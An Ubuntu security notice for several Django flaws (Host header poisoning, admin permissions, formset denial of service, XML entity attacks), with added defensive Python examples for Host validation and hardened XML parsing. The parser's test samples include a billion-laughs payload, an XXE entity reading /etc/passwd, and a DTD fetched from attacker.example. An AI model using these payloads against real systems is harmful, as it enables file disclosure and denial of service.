[USN-1757-1] Django vulnerabilities
Posted on 07 March 2013
==========================================================================
Ubuntu Security Notice USN-1757-1
March 07, 2013
python-django vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Django.
Software Description:
- python-django: High-level Python web development framework
Details:
James Kettle discovered that Django did not properly filter the Host HTTP
header when processing certain requests. An attacker could exploit this to
generate and display arbitrary URLs to users. Although this issue had been
previously addressed in USN-1632-1, this update adds additional hardening
measures to Host header validation. This update also adds a new
ALLOWED_HOSTS setting that can be set to a list of acceptable values for
the Host header. (CVE-2012-4520)
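The following is an added, stand-alone illustration of the kind of check the new ALLOWED_HOSTS setting enables; it is not Django's own code. It reimplements the documented matching rules for the setting ('*' matches any host, an entry with a leading dot matches that domain and all of its subdomains, any other entry must match exactly), strips an optional :port before matching, and rejects outright any Host value that does not look like a hostname or bracketed IPv6 literal (so a value such as attacker.net/reset@example.com can never reach a URL-building helper). The allow-list, the SuspiciousHost exception name and the helper names are this example's own assumptions, and the sample Host values used below are constructed.

```python
"""Model of an ALLOWED_HOSTS-style Host header check (added example, not Django code)."""
import re

# Constructed sample of what a deployment would put in settings.py.
ALLOWED_HOSTS = [".example.com", "shop.example.net", "[2001:db8::1]"]

# A hostname (letters, digits, dots, hyphens) or a bracketed IPv6 literal,
# optionally followed by :port. Anything else ('/', '@', '%', spaces...) is
# rejected before any matching happens.
_HOST_RE = re.compile(r"([a-z0-9.-]+|\[[a-f0-9:]+\])(:\d+)?")


class SuspiciousHost(ValueError):
    """Raised for a Host header that fails validation. Django raises
    SuspiciousOperation in this situation; this class name is the example's own."""


def host_matches(host, allowed):
    """Return True if `host` (already lower-cased, port removed) matches an entry."""
    for pattern in allowed:
        pattern = pattern.lower()
        if pattern == "*":
            return True
        if pattern.startswith("."):
            # ".example.com" matches example.com itself and any subdomain,
            # but not evilexample.com (no dot boundary) and not
            # example.com.attacker.net (wrong suffix).
            if host == pattern[1:] or host.endswith(pattern):
                return True
        elif pattern == host:
            return True
    return False


def get_host(header_value, allowed=ALLOWED_HOSTS):
    """Validate a raw Host header and return the canonical host (lower-case, no port)."""
    host = header_value.strip().lower()
    m = _HOST_RE.fullmatch(host)
    if not m:
        raise SuspiciousHost("malformed Host header: %r" % header_value)
    host = m.group(1)  # drop the :port part before matching
    if not host_matches(host, allowed):
        raise SuspiciousHost("Host not in ALLOWED_HOSTS: %r" % host)
    return host


def is_allowed(header_value, allowed=ALLOWED_HOSTS):
    """Boolean form of get_host() for callers that only need accept/reject."""
    try:
        get_host(header_value, allowed)
    except SuspiciousHost:
        return False
    return True


if __name__ == "__main__":
    # Constructed sample Host header values, including poisoning attempts.
    for value in ("www.Example.com:8000", "example.com", "[2001:db8::1]:8443",
                  "evilexample.com", "example.com.attacker.net",
                  "attacker.net/reset@example.com"):
        print("%-32s accepted=%s" % (value, is_allowed(value)))
```

The important property is that the decision is made against a fixed allow-list configured by the operator, not against anything derived from the request; once a deployment sets ALLOWED_HOSTS, a forged Host header produces an error page instead of a poisoned absolute URL.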
Orange Tsai discovered that Django incorrectly performed permission checks
when displaying the history view in the admin interface. An administrator
could use this flaw to view the history of any object, regardless of
intended permissions. (CVE-2013-0305)
It was discovered that Django incorrectly handled a large number of forms
when generating formsets. An attacker could use this flaw to cause Django
to consume memory, resulting in a denial of service. (CVE-2013-0306)
It was discovered that Django incorrectly deserialized XML. An attacker
could use this flaw to perform entity-expansion and external-entity/DTD
attacks. This update modifies Django's behaviour so that it no longer
allows DTDs, performs entity expansion, or fetches external entities/DTDs.
(CVE-2013-1664, CVE-2013-1665)
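To make the XML policy described above concrete, here is an added, stand-alone example (not Django's deserializer code) that applies the same three refusals to the Python standard library's expat parser: any DOCTYPE declaration, any entity declaration, and any external entity reference aborts the parse before the parser does any expansion work, and parameter-entity processing is switched off so an external DTD subset is never fetched. The exception class and function names are this example's own, and the four XML documents at the bottom are constructed samples (a benign document, a "billion laughs" expansion document, a file-reading external entity, and an external DTD reference).

```python
"""Refuse DTDs, entity expansion and external entities in XML (added example, not Django code)."""
import xml.parsers.expat as expat


class ForbiddenXML(ValueError):
    """Raised when the document uses a construct the policy disallows."""


def parse_hardened(data):
    """Parse `data` (bytes or str) and return the list of element names seen.

    A DOCTYPE, an entity declaration or an external entity reference raises
    ForbiddenXML from inside the expat callback, which aborts the parse.
    """
    parser = expat.ParserCreate()
    seen = []

    def on_start(name, attrs):
        seen.append(name)

    def forbid_dtd(name, sysid, pubid, has_internal_subset):
        # Fires for every <!DOCTYPE ...>, with or without an internal subset,
        # so both inline entity definitions and external DTDs are stopped here.
        raise ForbiddenXML("DOCTYPE declarations are not allowed (%s)" % name)

    def forbid_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML("entity declaration not allowed: %s" % name)

    def forbid_external(context, base, sysid, pubid):
        raise ForbiddenXML("external entity reference not allowed: %r" % sysid)

    parser.StartElementHandler = on_start
    parser.StartDoctypeDeclHandler = forbid_dtd
    parser.EntityDeclHandler = forbid_entity_decl
    parser.ExternalEntityRefHandler = forbid_external
    # Never process parameter entities (these live in the external DTD subset).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(data, True)
    return seen


def is_accepted(data):
    """True if the document parses under the policy, False if it was refused."""
    try:
        parse_hardened(data)
    except ForbiddenXML:
        return False
    return True


# Constructed sample documents.
BENIGN = b"<root><item>1</item><item>2</item></root>"

# Exponential entity expansion ("billion laughs"), truncated to two levels.
ENTITY_EXPANSION = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

# External entity that would read a local file into the document.
EXTERNAL_ENTITY = b"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>"""

# External DTD that would be fetched over the network.
EXTERNAL_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.example/evil.dtd">
<foo/>"""

if __name__ == "__main__":
    samples = [("benign", BENIGN), ("entity expansion", ENTITY_EXPANSION),
               ("external entity", EXTERNAL_ENTITY), ("external DTD", EXTERNAL_DTD)]
    for label, doc in samples:
        print("%-16s accepted=%s" % (label, is_accepted(doc)))
```

Refusing the DOCTYPE outright is the simplest robust policy for data formats, like Django's serialization format, that never legitimately carry one: it removes both the memory-exhaustion vector (entity expansion) and the information-disclosure vector (external entities and DTDs) with a single check, rather than trying to bound expansion depth or whitelist URL schemes.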
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.10:
python-django 1.4.1-2ubuntu0.3
Ubuntu 12.04 LTS:
python-django 1.3.1-4ubuntu1.6
Ubuntu 11.10:
python-django 1.3-2ubuntu1.6
Ubuntu 10.04 LTS:
python-django 1.1.1-2ubuntu1.8
In general, a standard system update will make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-1757-1
CVE-2012-4520, CVE-2013-0305, CVE-2013-0306, CVE-2013-1664,
CVE-2013-1665
Package Information:
https://launchpad.net/ubuntu/+source/python-django/1.4.1-2ubuntu0.3
https://launchpad.net/ubuntu/+source/python-django/1.3.1-4ubuntu1.6
https://launchpad.net/ubuntu/+source/python-django/1.3-2ubuntu1.6
https://launchpad.net/ubuntu/+source/python-django/1.1.1-2ubuntu1.8